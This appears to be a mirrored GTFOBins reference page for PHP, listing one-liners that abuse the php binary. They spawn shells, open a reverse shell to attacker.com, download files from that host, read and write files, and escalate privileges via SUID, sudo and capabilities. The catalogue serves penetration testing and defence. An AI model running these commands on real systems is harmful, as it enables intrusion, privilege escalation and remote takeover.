1
0
Fork 0
mirror of https://github.com/GTFOBins/GTFOBins.github.io.git synced 2024-05-24 00:06:03 +02:00
GTFOBins.github.io/_gtfobins/php.md
2021-04-11 12:12:53 +02:00

2.2 KiB

functions
shell command reverse-shell file-upload file-download suid sudo capabilities file-read file-write
code
export CMD="/bin/sh" php -r 'system(getenv("CMD"));'
code
export CMD="/bin/sh" php -r 'passthru(getenv("CMD"));'
code
export CMD="/bin/sh" php -r 'print(shell_exec(getenv("CMD")));'
code
export CMD="/bin/sh" php -r '$r=array(); exec(getenv("CMD"), $r); print(join("\n",$r));'
code
export CMD="/bin/sh" php -r '$h=@popen(getenv("CMD"),"r"); if($h){ while(!feof($h)) echo(fread($h,4096)); pclose($h); }'
code
export CMD="id" php -r '$p = array(array("pipe","r"),array("pipe","w"),array("pipe", "w"));$h = @proc_open(getenv("CMD"), $p, $pipes);if($h&&$pipes){while(!feof($pipes[1])) echo(fread($pipes[1],4096));while(!feof($pipes[2])) echo(fread($pipes[2],4096));fclose($pipes[0]);fclose($pipes[1]);fclose($pipes[2]);proc_close($h);}'
description code
Run `nc -l -p 12345` on the attacker box to receive the shell. export RHOST=attacker.com export RPORT=12345 php -r '$sock=fsockopen(getenv("RHOST"),getenv("RPORT"));exec("/bin/sh -i <&3 >&3 2>&3");'
description code
Serve files in the local folder running an HTTP server. This requires PHP version 5.4 or later. LHOST=0.0.0.0 LPORT=8888 php -S $LHOST:$LPORT
description code
Fetch a remote file via HTTP GET request. export URL=http://attacker.com/file_to_get export LFILE=file_to_save php -r '$c=file_get_contents(getenv("URL"));file_put_contents(getenv("LFILE"), $c);'
code
CMD="/bin/sh" ./php -r "pcntl_exec('/bin/sh', ['-p']);"
code
CMD="/bin/sh" sudo php -r "system('$CMD');"
code
CMD="/bin/sh" ./php -r "posix_setuid(0); system('$CMD');"
code
export LFILE=file_to_read php -r 'readfile(getenv("LFILE"));'
description code
write data to a file, filename should be absolute. export LFILE=file_to_write php -r 'file_put_contents(getenv("LFILE"), "DATA");'